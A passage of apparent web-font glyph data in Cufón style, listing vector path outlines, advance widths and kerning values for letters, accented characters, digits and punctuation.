-31,104r37,0r0,-104r-6,0xm126,-58r-51,0r-17,58r-66,0r97,-270r177,0r0,54r-80,0r0,50r76,0r0,54r-76,0r0,58r82,0r0,54r-142,0r0,-58","w":280},{"d":"110,-188v17,-5,31,-49,1,-49v-27,2,-12,40,-1,49xm91,-119v-33,21,-15,96,30,73v5,-2,9,-5,13,-8xm219,-144v-1,34,-11,62,-24,86r37,58r-64,0r-10,-15v-50,44,-146,17,-141,-59v3,-43,22,-67,50,-86v-12,-15,-22,-35,-22,-60v0,-38,32,-55,70,-56v40,-1,65,19,66,58v0,33,-22,54,-45,67v10,17,18,31,30,46r7,-39r46,0","w":240},{"d":"212,-58r0,-53r-29,53r29,0xm5,-246v22,-1,42,-5,46,-24r27,0r0,158r-37,0r0,-109r-36,0r0,-25xm47,0r147,-270r31,0r-147,270r-31,0xm154,-61r55,-97r40,0r0,100r16,0r0,27r-16,0r0,31r-37,0r0,-31r-58,0r0,-30","w":270},{"d":"97,-42v21,0,25,-15,25,-38r0,-123v3,-26,-37,-33,-43,-11v-11,39,-4,97,-4,147v0,15,6,25,22,25xm75,-276v25,-1,42,11,52,28r0,-22r138,0r0,54r-82,0r0,50r79,0r0,54r-79,0r0,58r84,0r0,54r-141,0r0,-23v-8,18,-25,29,-49,29v-83,0,-65,-103,-65,-183v0,-52,10,-99,63,-99","w":280},{"d":"71,-270r30,82r29,-82r63,0r-56,135r59,135r-64,0r-31,-81r-36,81r-60,0r60,-135r-57,-135r63,0","w":200},{"d":"51,-282r36,54r-49,0r-61,-54r74,0xm22,0r0,-202r57,0r0,202r-57,0","w":100},{"d":"75,-202v41,0,68,26,68,67v0,40,-27,68,-68,68v-41,0,-67,-28,-67,-68v0,-40,26,-67,67,-67","w":151},{"d":"108,-61v6,-38,-11,-60,-51,-55r0,-43v30,2,49,-8,48,-38v0,-16,-5,-27,-21,-27v-20,-1,-19,21,-20,39r-57,0v-4,-56,29,-85,78,-85v48,0,77,21,77,69v0,32,-12,50,-36,61v29,7,43,32,43,67v1,54,-32,79,-84,79v-56,0,-81,-34,-78,-93r57,0v0,24,0,47,23,48v14,0,20,-10,21,-22"},{"d":"54,-252v-23,3,-8,45,-12,68v0,14,24,15,24,0v0,-23,10,-64,-12,-68xm54,-148v-28,0,-48,-10,-49,-38r0,-49v0,-30,20,-40,49,-41v54,-3,51,41,49,90v-2,27,-21,38,-49,38","w":108},{"d":"161,-271v-5,25,-16,47,-45,48v-27,1,-57,-32,-68,2r-28,0v5,-26,15,-49,44,-51v26,-2,56,30,68,1r29,0xm105,-144v0,-11,-4,-17,-15,-17v-10,0,-15,6,-15,17r0,144r-57,0r0,-202r53,0v1,8,-2,20,1,26v7,-16,17,-31,40,-31v30,0,51,14,51,42r0,165r-58,0r0,-144"},{"d":"111,-346r57,0r0,47r-57,0r0,-47xm90,-346r0,47r-57,0r0,-47r57,0xm100,6v-55,0,-86,-25,-85,-81r0,-195r63,0r0,204v0,15,6,24,22,24v16,1,21,-12,22,-26r0,-202r63,0r0,195v1,56,-29,81,-85,81","w":200},{"d":"105,-44v5,-28,16,-92,-18,-88r0,-42v22,2,16,-21,17,-41v0,-12,-4,-20,-16,-20v-11,0,-14,8,-15,18r0,217r-57,0r0,-212v-1,-44,32,-64,74,-64v70,0,94,89,45,120v32,10,31,51,31,93v0,48,-33,82,-79,64r0,-42v9,2,15,1,18,-3"},{"d":"90,-39v17,0,21,-15,20,-33r0,-128v-1,-12,-6,-25,-20,-25v-18,0,-19,15,-20,31r1,134v1,12,6,21,19,21xm90,6v-51,0,-81,-22,-80,-74r0,-126v0,-53,28,-73,80,-76v99,-6,79,98,80,189v1,58,-21,87,-80,87"},{"d":"125,-103v16,0,18,-17,25,-26r21,26v-11,17,-19,42,-46,42v-26,0,-45,-19,-67,-24v-18,1,-21,18,-28,30r-21,-27v11,-18,20,-43,48,-44v28,-1,42,23,68,23"},{"d":"77,-190r22,-15r0,47r-22,16r0,88r77,0r0,54r-141,0r0,-104r-21,15r0,-47r21,-15r0,-119r64,0r0,80","w":159},{"d":"88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-6,13,-15,27,-34,28r0,65r-57,0r0,-270r57,0r1,151v1,6,4,12,13,11"},{"d":"184,-170v-22,0,-22,22,-21,44r39,0v0,-21,2,-43,-18,-44xm84,-35v28,-1,21,-35,23,-63v-18,11,-42,12,-42,41v0,13,4,23,19,22xm136,-192v44,-34,132,-10,123,57r0,46r-95,0v2,23,-7,56,18,56v17,0,18,-16,17,-34r58,0v2,52,-25,73,-77,73v-22,0,-43,-6,-51,-21v-30,35,-121,30,-121,-36v0,-56,40,-64,83,-76v21,-6,21,-44,-4,-43v-17,0,-24,12,-22,31r-57,0v-12,-70,84,-84,128,-53","w":259},{"d":"91,-282r36,54r-49,0r-61,-54r74,0xm90,-166v-13,0,-18,11,-18,23r0,90v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-90v0,-12,-5,-23,-18,-23xm90,6v-44,0,-74,-17,-75,-62r0,-82v0,-48,27,-69,75,-69v49,0,75,21,75,69r0,82v-2,45,-30,62,-75,62"},{"d":"67,34r-82,-304r39,0r81,304r-38,0","w":90},{"d":"110,-343r53,0r-43,54r-60,0r-43,-54r53,0r20,27xm88,6v-60,0,-89,-31,-82,-96r58,0v-1,26,0,48,26,48v26,0,25,-41,9,-53v-38,-27,-90,-40,-90,-105v0,-91,139,-102,157,-24v3,11,4,22,3,35r-58,0v8,-33,-33,-57,-43,-21v5,55,80,47,95,96v18,60,-6,120,-75,120"},{"d":"90,-40v30,-8,15,-63,17,-98v0,-13,-4,-22,-16,-23v-31,6,-16,62,-18,97v2,12,5,23,17,24xm115,6v-21,0,-31,-14,-43,-25r0,87r-57,0r0,-338r57,0r1,89v8,-14,21,-26,43,-26v61,1,49,78,49,139v0,39,-10,74,-50,74"},{"d":"30,-59r0,-62r60,0r0,62r-60,0","w":119},{"d":"-8,-239r0,-32r136,0r0,32r-136,0","w":119},{"d":"60,-278r60,0r43,53r-53,0r-20,-27r-20,27r-53,0xm88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-7,15,-18,31,-40,31v-32,1,-51,-12,-51,-42r0,-166r57,0r1,151v1,6,4,12,13,11"},{"d":"153,-84v18,0,35,-8,36,-26r32,0v-4,34,-29,55,-66,55v-50,0,-73,-33,-78,-82v-9,-87,128,-113,144,-28r-32,0v-4,-17,-16,-26,-35,-26v-30,0,-43,22,-43,53v0,31,13,54,42,54xm256,-137v0,-66,-41,-105,-107,-105v-66,0,-106,39,-106,107v0,68,40,107,106,107v67,0,107,-42,107,-109xm291,-135v0,87,-54,141,-142,141v-91,0,-141,-55,-141,-141v0,-85,50,-141,141,-141v90,0,142,55,142,141","w":298},{"d":"0,-33v24,-15,46,-48,34,-87r-32,0r0,-23r23,0v-35,-52,-13,-138,63,-133v51,3,83,30,78,88r-55,0v0,-23,-2,-43,-24,-43v-38,0,-16,64,-9,88r52,0r0,23r-45,0v7,45,-20,65,-41,85v34,-27,86,13,114,-16r12,45v-45,32,-108,-21,-150,12"},{"w":90},{"d":"10,-139r0,-49r51,0r0,-82r57,0r0,82r52,0r0,49r-52,0r0,201r-57,0r0,-201r-51,0"},{"d":"66,24v0,17,21,22,34,13r0,31v-32,13,-74,6,-74,-30v0,-26,27,-44,60,-37v-9,5,-19,11,-20,23","w":119},{"d":"71,-243r0,126r-52,0r0,-126r52,0xm19,-63r52,0r0,126r-52,0r0,-126","w":90},{"d":"90,-166v-13,0,-18,11,-18,23r0,90v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-90v0,-12,-5,-23,-18,-23xm161,-271v-5,25,-16,47,-45,48v-27,1,-57,-32,-68,2r-28,0v5,-26,15,-49,44,-51v26,-2,56,30,68,1r29,0xm90,6v-44,0,-74,-17,-75,-62r0,-82v0,-48,27,-69,75,-69v49,0,75,21,75,69r0,82v-2,45,-30,62,-75,62"},{"d":"22,0r0,-202r57,0r0,202r-57,0","w":100},{"d":"21,-270r57,0r0,91r24,-14r0,39r-24,13r0,141r-57,0r0,-109r-24,13r0,-38r24,-14r0,-122","w":100},{"d":"111,-346r57,0r0,47r-57,0r0,-47xm90,-346r0,47r-57,0r0,-47r57,0xm100,-182r33,-88r63,0r-65,157r0,113r-63,0r0,-113r-64,-157r64,0","w":200},{"d":"18,-246v22,-1,42,-5,46,-24r26,0r0,158r-37,0r0,-109r-35,0r0,-25","w":108},{"d":"90,-166v-13,0,-18,11,-18,23r0,90v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-90v0,-12,-5,-23,-18,-23xm60,-274r60,0r43,53r-53,0r-20,-27r-20,27r-53,0xm90,6v-44,0,-74,-17,-75,-62r0,-82v0,-48,27,-69,75,-69v49,0,75,21,75,69r0,82v-2,45,-30,62,-75,62"},{"d":"164,-219v-34,63,-54,134,-64,219r-63,0v8,-83,41,-153,70,-216r-98,0r0,-48r155,0r0,45"},{"d":"90,-274r53,0r-43,53r-60,0r-43,-53r53,0r20,27xm9,-202r126,0r0,42r-66,115r66,0r0,45r-130,0r0,-40r66,-117r-62,0r0,-45","w":140},{"d":"91,-277r57,0r0,47r-57,0r0,-47xm70,-277r0,47r-57,0r0,-47r57,0xm20,24v33,10,27,-19,22,-43r-40,-183r58,0r20,131r20,-131r56,0r-46,211v-7,43,-37,67,-90,57r0,-42","w":159},{"d":"71,-194v0,-19,6,-44,-14,-44v-19,0,-13,26,-14,46v0,12,2,23,14,23v12,0,14,-13,14,-25xm357,-56v-1,-20,6,-43,-14,-44v-19,0,-13,27,-14,46v0,12,3,22,14,23v12,0,14,-13,14,-25xm223,-56v-1,-20,5,-43,-15,-44v-20,0,-11,26,-13,46v-2,13,2,22,14,23v12,0,14,-13,14,-25xm86,6r-29,0r122,-276r29,0xm151,-66v0,-41,16,-67,57,-67v44,1,58,21,58,67v0,42,-13,67,-57,67v-45,0,-58,-25,-58,-67xm285,-66v0,-41,17,-67,58,-67v44,0,57,22,58,67v1,43,-14,67,-58,67v-45,0,-57,-25,-58,-67xm0,-204v1,-41,15,-67,57,-67v44,1,57,22,58,67v1,44,-15,68,-58,68v-43,0,-58,-24,-57,-68","w":399},{"d":"171,-34r-162,0r0,-42r162,0r0,42xm171,-104r-162,0r0,-42r162,0r0,42"},{"d":"91,-170v-20,-1,-21,21,-20,41r40,0v1,-22,-1,-40,-20,-41xm164,-282r-62,54r-49,0r36,-54r75,0xm91,-207v44,0,77,15,77,58r0,58r-97,0v1,24,-6,56,18,56v19,0,19,-18,20,-35r57,0v2,52,-24,76,-75,76v-45,0,-77,-16,-77,-62r0,-82v-1,-50,28,-69,77,-69"},{"d":"-60,0r147,-270r30,0r-146,270r-31,0","w":60},{"d":"126,-207r0,61r-61,0r0,-61r61,0xm94,19v19,0,22,-16,21,-36r57,0v2,53,-28,80,-79,85v-76,7,-105,-76,-59,-125v16,-17,34,-32,34,-65r54,0v9,60,-49,70,-49,118v0,12,7,24,21,23"},{"d":"30,-282r60,0r43,54r-53,0r-20,-27r-20,27r-53,0","w":119},{"d":"88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-6,13,-15,27,-34,28r0,65r-57,0r0,-270r57,0r1,151v1,6,4,12,13,11"},{"d":"109,-266v0,-9,-9,-19,-19,-18v-9,-1,-19,9,-18,18v-1,10,9,19,18,19v9,0,19,-9,19,-19xm87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm131,-266v-3,24,-16,41,-41,41v-24,0,-40,-16,-40,-41v0,-24,16,-40,40,-40v25,0,38,17,41,40xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"18,0r0,-270r64,0r0,270r-64,0","w":100},{"d":"4,-246v22,-1,42,-5,46,-24r26,0r0,158r-37,0r0,-109r-35,0r0,-25xm39,0r147,-270r31,0r-147,270r-31,0xm226,-125v-5,-18,-28,-9,-27,7r0,15r-37,0v-2,-39,15,-59,53,-59v55,0,65,63,29,91v-15,11,-31,23,-38,42r60,0r0,29r-105,0v-1,-55,43,-70,64,-104v3,-5,2,-15,1,-21","w":270},{"d":"100,-343r53,0r-43,54r-60,0r-43,-54r53,0r20,27xm9,-270r144,0r0,50r-79,166r82,0r0,54r-152,0r0,-48r80,-168r-75,0r0,-54","w":159},{"d":"69,-225v37,86,24,223,-18,292r-44,0v40,-95,39,-243,-1,-337r45,0","w":100},{"d":"61,-277r57,0r0,47r-57,0r0,-47xm40,-277r0,47r-57,0r0,-47r57,0xm22,0r0,-202r57,0r0,202r-57,0","w":100},{"d":"6,-168r0,-98r43,0r0,98r-43,0xm72,-168r0,-98r42,0r0,98r-42,0","w":119},{"d":"96,-274r54,0r-44,53r-59,0r-43,-53r53,0r20,27xm54,-84v-72,-18,-60,-132,26,-123v43,5,73,20,73,65r-54,0v-1,-15,-3,-28,-19,-28v-28,-1,-21,33,-2,38v35,16,75,24,78,74v5,75,-124,85,-147,28v-3,-9,-5,-20,-5,-32r55,0v-9,33,41,43,41,12v0,-23,-30,-24,-46,-34","w":159},{"d":"87,-161v-27,7,-15,58,-15,88v0,13,3,21,17,21v29,-3,13,-53,17,-82v-1,-14,-3,-26,-19,-27xm163,4v9,73,-113,84,-144,36v-4,-7,-6,-17,-6,-29r57,0v0,14,4,22,19,19v26,3,16,-37,16,-57v-27,42,-95,16,-91,-41v4,-61,-11,-137,50,-139v23,0,36,15,46,30r0,-25r53,0r0,206"},{"d":"107,49v0,40,-62,41,-93,24r7,-16v14,4,46,16,50,-6v-1,-13,-19,-16,-30,-9r-9,-9r20,-33r21,0r-14,23v23,-5,48,2,48,26","w":119},{"d":"69,-177r42,0r0,66r60,0r0,42r-60,0r0,69r-42,0r0,-69r-60,0r0,-42r60,0r0,-66"},{"d":"154,-282r-62,54r-49,0r36,-54r75,0xm20,24v33,10,27,-19,22,-43r-40,-183r58,0r20,131r20,-131r56,0r-46,211v-7,43,-37,67,-90,57r0,-42","w":159},{"d":"124,-221r0,-49r57,0r0,49r-57,0xm124,0r0,-202r57,0r0,202r-57,0xm30,-202v-7,-58,24,-73,82,-68r0,41v-10,0,-23,-2,-25,7r0,20r25,0r0,42r-25,0r0,160r-57,0r0,-160r-23,0r0,-42r23,0","w":200},{"d":"61,-282r36,54r-49,0r-62,-54r75,0","w":119},{"d":"119,-177r0,41r-57,0r0,-41r57,0xm119,-44r0,41r-57,0r0,-41r57,0xm9,-111r162,0r0,42r-162,0r0,-42"},{"d":"-8,-239r0,-32r136,0r0,32r-136,0","w":119},{"d":"112,0v-43,7,-85,3,-85,-44r0,-116r-23,0r0,-42r23,0r0,-57r57,0r0,57r28,0r0,42r-28,0r0,106v0,17,13,13,28,13r0,41","w":119},{"d":"88,6v-60,0,-89,-31,-82,-96r58,0v-1,26,0,48,26,48v26,0,25,-41,9,-53v-38,-27,-90,-40,-90,-105v0,-91,139,-102,157,-24v3,11,4,22,3,35r-58,0v8,-33,-33,-57,-43,-21v5,55,80,47,95,96v18,60,-6,120,-75,120"},{"d":"87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm60,-274r60,0r43,53r-53,0r-20,-27r-20,27r-53,0xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"112,-282r76,0r-63,54r-49,0xm5,-282r75,0r-62,54r-49,0","w":119},{"d":"21,-343r59,0r43,54r-53,0r-20,-27r-20,27r-53,0xm18,0r0,-270r64,0r0,270r-64,0","w":100},{"d":"145,-202r22,131r16,-131r54,0r-39,202r-61,0r-17,-105r-17,105r-61,0r-39,-202r56,0r17,131r20,-131r49,0","w":240,"k":{".":13,",":13}},{"d":"71,-343r59,0r44,54r-54,0r-20,-27r-20,27r-53,0xm100,6v-55,0,-86,-25,-85,-81r0,-195r63,0r0,204v0,15,6,24,22,24v16,1,21,-12,22,-26r0,-202r63,0r0,195v1,56,-29,81,-85,81","w":200},{"d":"17,0r0,-270r145,0r0,54r-82,0r0,50r79,0r0,54r-79,0r0,58r86,0r0,54r-149,0"},{"d":"-10,34r81,-304r40,0r-83,304r-38,0","w":100},{"d":"90,-166v-28,1,-17,50,-17,76r35,-50v-1,-14,-3,-26,-18,-26xm90,-35v31,-1,15,-57,17,-84r-35,52v-1,18,0,33,18,32xm165,-56v4,63,-79,74,-124,51r-20,32r-25,-17r25,-37v-11,-28,-3,-74,-6,-111v-6,-66,71,-83,121,-59r19,-31r26,17r-24,36v14,28,6,79,8,119"},{"d":"79,-269v0,-9,-10,-19,-19,-19v-9,0,-19,10,-19,19v0,9,9,19,19,18v10,1,19,-9,19,-18xm100,-269v0,24,-15,40,-40,40v-25,0,-38,-17,-41,-40v2,-24,17,-41,41,-41v24,0,40,16,40,41","w":119},{"d":"15,-85r0,-54r90,0r0,54r-90,0","w":119},{"d":"91,-282r36,54r-49,0r-61,-54r74,0xm88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-7,15,-18,31,-40,31v-32,1,-51,-12,-51,-42r0,-166r57,0r1,151v1,6,4,12,13,11"},{"d":"9,-37r162,0r0,41r-162,0r0,-41xm69,-184r42,0r0,43r60,0r0,41r-60,0r0,45r-42,0r0,-45r-60,0r0,-41r60,0r0,-43"},{"d":"185,-170v-21,-1,-22,22,-21,44r37,0v-1,-19,2,-43,-16,-44xm88,-35v12,0,19,-6,19,-18r0,-94v-2,-11,-6,-19,-19,-19v-12,0,-19,6,-18,19r0,94v0,12,6,18,18,18xm136,-186v32,-40,126,-22,122,39r0,58r-94,0v1,25,-6,56,21,54v15,-1,16,-18,16,-34r56,0v12,72,-81,96,-121,55v-11,13,-29,20,-52,20v-77,0,-73,-65,-71,-138v-13,-75,83,-95,123,-54","w":259},{"d":"164,-350r-62,53r-49,0r36,-53r75,0xm17,0r0,-270r145,0r0,54r-82,0r0,50r79,0r0,54r-79,0r0,58r86,0r0,54r-149,0"},{"d":"100,-221r-19,121r37,0xm111,-346r57,0r0,47r-57,0r0,-47xm90,-346r0,47r-57,0r0,-47r57,0xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200},{"d":"124,-350r-62,53r-49,0r36,-53r75,0xm18,0r0,-270r64,0r0,270r-64,0","w":100},{"d":"100,6v-55,0,-86,-25,-85,-81r0,-195r63,0r0,204v0,15,6,24,22,24v16,1,21,-12,22,-26r0,-202r63,0r0,195v1,56,-29,81,-85,81","w":200},{"d":"101,-277r57,0r0,47r-57,0r0,-47xm80,-277r0,47r-57,0r0,-47r57,0xm88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-7,15,-18,31,-40,31v-32,1,-51,-12,-51,-42r0,-166r57,0r1,151v1,6,4,12,13,11"},{"d":"87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm91,-282r36,54r-49,0r-61,-54r74,0xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"22,34v20,0,30,-14,30,-34r-30,0r0,-58r56,0v2,57,5,114,-56,113r0,-21","w":100},{"d":"91,-226v-23,-2,-22,23,-21,43v2,11,7,21,19,21v18,0,23,-15,23,-33v0,-16,-5,-30,-21,-31xm68,-92v0,26,-2,55,22,55v25,0,23,-30,22,-56v-1,-15,-7,-26,-23,-26v-16,0,-22,11,-21,27xm85,6v-81,6,-98,-118,-41,-149v-21,-11,-32,-26,-32,-56v0,-49,29,-71,78,-71v48,-1,78,23,78,71v0,29,-14,45,-33,57v22,13,35,30,35,65v-1,58,-28,79,-85,83"},{"d":"102,33v-46,7,-78,-4,-78,-52v0,-41,10,-91,-27,-98v66,-11,-24,-164,82,-153v7,1,18,-2,23,1v-62,6,10,139,-57,152v64,4,-4,135,57,150","w":98},{"d":"-60,0r147,-270r30,0r-146,270r-31,0","w":60},{"d":"47,-112v0,26,18,45,44,45v27,0,45,-19,45,-45v0,-26,-18,-44,-45,-44v-26,0,-44,18,-44,44xm16,-65v-17,-23,-18,-70,0,-93r-16,-16r28,-29r16,16v26,-16,68,-20,95,0r16,-16r28,29r-16,16v17,22,17,70,0,93r16,16r-28,28r-16,-16v-23,18,-69,19,-95,0r-16,16r-28,-28"},{"d":"86,-40v33,-4,18,-61,18,-96v0,-13,-5,-23,-17,-25v-31,8,-12,62,-17,98v1,12,4,22,16,23xm62,-207v24,0,35,15,47,30r0,-25r53,0r0,270r-57,0r-1,-87v-10,15,-23,25,-41,25v-64,0,-50,-82,-50,-144v0,-37,12,-69,49,-69"},{"d":"0,-91r0,-41r180,0r0,41r-180,0"},{"d":"99,-42v27,0,21,-30,22,-56r-23,0r0,-49r86,0r0,147r-43,0r-3,-24v-12,22,-23,29,-55,30v-93,4,-71,-110,-71,-196v0,-59,26,-86,85,-86v62,0,92,30,86,98r-63,0v-1,-24,3,-50,-20,-50v-20,-1,-24,9,-25,28r0,134v0,16,8,24,24,24","w":200},{"d":"165,-32r0,40r-150,-81r0,-35r150,-82r0,40r-107,60"},{"d":"74,-270r33,0r0,41r40,-15r10,33r-41,12r28,37r-26,21r-28,-38r-26,36r-28,-19r28,-36r-41,-12r11,-32r40,14r0,-42"},{"d":"171,-270r26,189r19,-189r60,0r-45,270r-71,0r-20,-190r-21,190r-70,0r-45,-270r61,0r19,190r26,-190r61,0","w":280,"k":{"o":6,"e":6,"a":6,"A":6,".":27,"-":6,",":27}},{"d":"52,-209v1,20,-5,46,14,46v19,0,13,-27,15,-45v1,-12,-3,-24,-15,-24v-12,-1,-14,11,-14,23xm248,-56v-1,-20,6,-43,-14,-44v-19,0,-13,27,-14,46v-2,13,2,22,14,23v12,0,14,-13,14,-25xm105,6r-30,0r122,-276r29,0xm176,-66v0,-41,17,-67,58,-67v43,0,58,24,58,67v0,43,-14,67,-58,67v-45,0,-57,-25,-58,-67xm124,-198v0,43,-14,67,-58,67v-44,0,-58,-24,-57,-67v0,-41,15,-67,57,-67v43,1,58,22,58,67","w":299},{"d":"74,-340v26,0,56,30,68,1r29,0v-5,25,-16,46,-45,47v-27,1,-58,-29,-68,3r-28,0v6,-25,13,-51,44,-51xm101,-42v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26xm101,-276v54,0,85,28,85,80v-2,96,21,202,-85,202v-106,0,-86,-105,-87,-202v0,-52,32,-80,87,-80","w":200},{"d":"90,-161v-32,7,-13,61,-18,98v1,12,5,22,17,23v30,-6,12,-60,17,-96v-2,-12,-4,-23,-16,-25xm64,-207v22,-1,30,11,42,24r0,-87r57,0r0,270r-53,0v-1,-7,2,-18,-1,-23v-8,16,-24,29,-44,29v-64,0,-50,-82,-50,-144v0,-37,12,-69,49,-69"},{"d":"79,-164v26,1,41,-4,41,-32v0,-25,-17,-26,-41,-25r0,57xm124,-84v0,-29,-18,-31,-45,-31r0,66v30,2,45,-3,45,-35xm188,-78v0,88,-87,79,-172,78r0,-270v79,1,171,-13,167,70v0,27,-11,47,-30,57v22,13,35,30,35,65","w":200},{"d":"13,0r0,-270r64,0r0,216r77,0r0,54r-141,0","w":159,"k":{"y":13,"Y":33,"W":27,"V":27,"T":27,"\u2019":33}},{"d":"164,-282r-62,54r-49,0r36,-54r75,0xm88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-7,15,-18,31,-40,31v-32,1,-51,-12,-51,-42r0,-166r57,0r1,151v1,6,4,12,13,11"},{"d":"30,36v21,0,30,-16,32,-36r-32,0r0,-62r60,0v2,59,5,119,-60,118r0,-20","w":119},{"d":"126,-188v0,-28,-14,-36,-44,-33r0,67v29,3,44,-6,44,-34xm189,-189v0,65,-37,90,-107,84r0,105r-63,0r0,-270r95,1v50,1,75,28,75,80","w":200,"k":{"A":13,".":46,",":46}},{"d":"174,-350r-62,53r-49,0r36,-53r75,0xm101,-42v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26xm101,-276v54,0,85,28,85,80v-2,96,21,202,-85,202v-106,0,-86,-105,-87,-202v0,-52,32,-80,87,-80","w":200},{"d":"91,-170v-20,-1,-21,21,-20,41r40,0v1,-22,-1,-40,-20,-41xm60,-274r60,0r43,53r-53,0r-20,-27r-20,27r-53,0xm91,-207v44,0,77,15,77,58r0,58r-97,0v1,24,-6,56,18,56v19,0,19,-18,20,-35r57,0v2,52,-24,76,-75,76v-45,0,-77,-16,-77,-62r0,-82v-1,-50,28,-69,77,-69"},{"d":"100,-221r-19,121r37,0xm74,-340v26,0,56,30,68,1r29,0v-5,25,-16,46,-45,47v-27,1,-58,-29,-68,3r-28,0v6,-25,13,-51,44,-51xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200},{"d":"18,0r0,-270r89,0r33,159r34,-159r89,0r0,270r-61,0r6,-212r-45,212r-47,0r-44,-212r6,212r-60,0","w":280},{"d":"101,-42v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26xm101,-276v54,0,85,28,85,80v-2,96,21,202,-85,202v-106,0,-86,-105,-87,-202v0,-52,32,-80,87,-80","w":200},{"d":"8,-270r164,0r0,54r-51,0r0,216r-63,0r0,-216r-50,0r0,-54","k":{"y":20,"w":27,"u":27,"s":27,"r":27,"o":27,"i":6,"e":27,"c":27,"a":27,"A":20,";":27,":":27,".":33,"-":20,",":33}},{"d":"18,-138v-13,-76,93,-85,131,-50v13,12,17,33,15,61r-54,0v-1,-17,1,-39,-18,-39v-15,0,-17,12,-17,25r0,83v0,13,4,24,18,23v20,-1,18,-26,18,-47r55,0v3,59,-19,90,-77,88v-44,-1,-71,-17,-71,-62r0,-82"},{"d":"100,-221r-19,121r37,0xm102,-350r36,53r-50,0r-61,-53r75,0xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200},{"d":"87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"91,-350r36,53r-49,0r-61,-53r74,0xm17,0r0,-270r145,0r0,54r-82,0r0,50r79,0r0,54r-79,0r0,58r86,0r0,54r-149,0"},{"d":"0,-91r0,-41r360,0r0,41r-360,0","w":360},{"d":"124,-282r-62,54r-49,0r36,-54r75,0xm22,0r0,-202r57,0r0,202r-57,0","w":100},{"d":"113,-143v-19,-2,-41,-4,-41,19r0,124r-57,0r0,-202r53,0v1,10,-2,23,1,31v6,-19,19,-36,44,-36r0,64","w":119,"k":{"y":-6,"w":-6,"v":-6,".":27,"-":13,",":27}},{"d":"122,-90r-107,-60r0,-40r150,82r0,35r-150,81r0,-40"},{"d":"90,-156v-34,5,-18,68,-18,103v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-79v0,-12,-5,-26,-18,-24xm101,-189v-7,-16,-25,-32,-39,-48r-30,20r-15,-18r28,-19r-22,-22r36,-26r23,23r28,-18r15,18r-26,17v32,35,66,67,66,134r0,72v-1,45,-29,62,-75,62v-44,0,-74,-17,-75,-62v-1,-67,-8,-143,59,-141v13,1,20,1,27,8"},{"d":"100,-86r0,-53r65,-43r0,47r-37,23r37,21r0,47xm13,-86r0,-53r65,-43r0,47r-36,23r36,21r0,47"},{"d":"49,67v-51,-88,-53,-251,0,-337r44,0v-40,95,-39,243,1,337r-45,0","w":100},{"w":90},{"d":"100,-228v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24xm101,-276v54,0,87,28,85,80v-2,62,11,141,-18,177r30,32r-37,31r-36,-40v-70,12,-111,-21,-111,-90r0,-110v0,-52,32,-80,87,-80","w":200},{"d":"82,-219v-32,2,-29,50,0,55r0,-55xm98,-36v23,0,34,-36,16,-51v-3,-3,-9,-5,-16,-9r0,60xm174,-69v0,47,-26,72,-70,75r0,39r-32,0r0,-40v-45,-6,-68,-31,-67,-82r50,0v2,21,3,38,24,42r0,-68v-37,-18,-72,-34,-71,-88v1,-41,28,-64,67,-68r0,-24r32,0r0,24v42,4,66,30,66,76r-50,0v0,-19,-6,-33,-23,-35r0,63v38,17,75,31,74,86"},{"d":"15,-85r0,-54r90,0r0,54r-90,0","w":119},{"d":"100,-182r33,-88r63,0r-65,157r0,113r-63,0r0,-113r-64,-157r64,0","w":200,"k":{"v":6,"u":13,"q":27,"p":13,"o":20,"i":6,"e":20,"a":20,"A":20,";":13,":":13,".":40,"-":27,",":40}},{"d":"69,6v-52,0,-73,-36,-66,-96r50,0v2,18,-8,49,13,48v9,-1,13,-1,12,-10r1,-218r63,0r0,217v-3,39,-29,59,-73,59","w":159},{"d":"19,-86r0,-53r65,-43r0,47r-36,23r36,21r0,47","w":100},{"d":"20,0r0,-62r61,0r0,62r-61,0xm20,-138r0,-62r61,0r0,62r-61,0